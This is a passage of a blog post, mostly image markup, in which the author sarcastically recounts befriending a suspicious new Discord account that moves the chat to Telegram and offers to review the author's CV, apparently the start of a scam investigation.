view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>These posts are <strong>absolutely organic</strong> and definitely <strong>do not</strong> come from a <strong>shared online document</strong> detailing <strong>social networking engagement guidelines</strong> and <strong>post templates</strong> to promote the appearance of organic activity.</p><p>I decided to check on him and we ended up being friends on <strong>Discord</strong>, because everybody deserves a friend. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!DzTi!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!DzTi!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png 424w, https://substackcdn.com/image/fetch/$s_!DzTi!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png 848w, https://substackcdn.com/image/fetch/$s_!DzTi!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png 1272w, https://substackcdn.com/image/fetch/$s_!DzTi!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!DzTi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png" width="320" height="602.4" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e8c09e43-57fd-4756-944a-e487b13a8721_800x1506.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1506,&quot;width&quot;:800,&quot;resizeWidth&quot;:320,&quot;bytes&quot;:1482899,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c09e43-57fd-4756-944a-e487b13a8721_800x1506.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!DzTi!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png 424w, https://substackcdn.com/image/fetch/$s_!DzTi!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png 848w, https://substackcdn.com/image/fetch/$s_!DzTi!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png 1272w, https://substackcdn.com/image/fetch/$s_!DzTi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4982046f-4a45-45b2-83e4-54a9e6577429_800x1506.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I quickly found out his account is just 13 days old, so maybe <strong>he is new</strong> to all this Discord thing. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Kj87!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Kj87!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png 424w, https://substackcdn.com/image/fetch/$s_!Kj87!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png 848w, https://substackcdn.com/image/fetch/$s_!Kj87!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png 1272w, https://substackcdn.com/image/fetch/$s_!Kj87!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Kj87!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png" width="432" height="536.0516129032258" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a74603ea-8a35-4aa0-9035-c93214516f82_930x1154.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1154,&quot;width&quot;:930,&quot;resizeWidth&quot;:432,&quot;bytes&quot;:204847,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa74603ea-8a35-4aa0-9035-c93214516f82_930x1154.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Kj87!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png 424w, https://substackcdn.com/image/fetch/$s_!Kj87!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png 848w, https://substackcdn.com/image/fetch/$s_!Kj87!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png 1272w, https://substackcdn.com/image/fetch/$s_!Kj87!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cb25c58-964e-4dd9-85de-a582ab20422c_930x1154.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I&#8217;m not a fan of Discord so I asked him for his Telegram and we kept the conversation there.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oZht!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!oZht!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png 424w, https://substackcdn.com/image/fetch/$s_!oZht!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png 848w, https://substackcdn.com/image/fetch/$s_!oZht!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png 1272w, https://substackcdn.com/image/fetch/$s_!oZht!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oZht!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png" width="306" height="615.0523690773067" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ffde8ff2-2f87-447a-abbf-839835b29c61_802x1612.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1612,&quot;width&quot;:802,&quot;resizeWidth&quot;:306,&quot;bytes&quot;:1009453,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffde8ff2-2f87-447a-abbf-839835b29c61_802x1612.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!oZht!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png 424w, https://substackcdn.com/image/fetch/$s_!oZht!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png 848w, https://substackcdn.com/image/fetch/$s_!oZht!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png 1272w, https://substackcdn.com/image/fetch/$s_!oZht!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff88d3c1f-32bb-4d70-b605-eb24cbaa1b57_802x1612.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Why does his profile say &#8220;<em>Robbery</em>&#8221;? Weird, but I&#8217;m happy to have my new friend added on all my socials so we can hang out any time. So, I&#8217;ll let that detail slip.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!eaQp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!eaQp!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png 424w, https://substackcdn.com/image/fetch/$s_!eaQp!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png 848w, https://substackcdn.com/image/fetch/$s_!eaQp!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png 1272w, https://substackcdn.com/image/fetch/$s_!eaQp!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!eaQp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png" width="438" height="515" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:515,&quot;width&quot;:438,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:29977,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!eaQp!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png 424w, https://substackcdn.com/image/fetch/$s_!eaQp!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png 848w, https://substackcdn.com/image/fetch/$s_!eaQp!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png 1272w, https://substackcdn.com/image/fetch/$s_!eaQp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac3f3abd-c3b7-4737-9b9c-0699d8e80b86_438x515.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>He then offers to check my CV for me and help me get a job. What a nice guy indeed!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!aMQC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!aMQC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png 424w, https://substackcdn.com/image/fetch/$s_!aMQC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png 848w, https://substackcdn.com/image/fetch/$s_!aMQC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png 1272w, https://substackcdn.com/image/fetch/$s_!aMQC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!aMQC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png" width="326" height="650.3821339950372" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5a8a2533-23eb-460f-a626-8563f5799495_806x1608.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1608,&quot;width&quot;:806,&quot;resizeWidth&quot;:326,&quot;bytes&quot;:1258246,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/178512323?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5a8a2533-23eb-460f-a626-8563f5799495_806x1608.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!aMQC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png 424w, https://substackcdn.com/image/fetch/$s_!aMQC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png 848w, https://substackcdn.com/image/fetch/$s_!aMQC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png 1272w, https://substackcdn.com/image/fetch/$s_!aMQC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F96a739dc-35cb-4f6d-8645-8d425c6a57f1_806x1608.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0wLO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0wLO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png 424w, https://substackcdn.com/image/fetch/$s_!0wLO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png 848w, https://substackcdn.com/image/fetch/$s_!0wLO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png 1272w, https://substackcdn.com/image/fetch/$s_!0wLO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F70a8a06e-139b-4068-9fc9-420a0b8cde6a_856x1698.png 1456w" sizes="100vw"><img 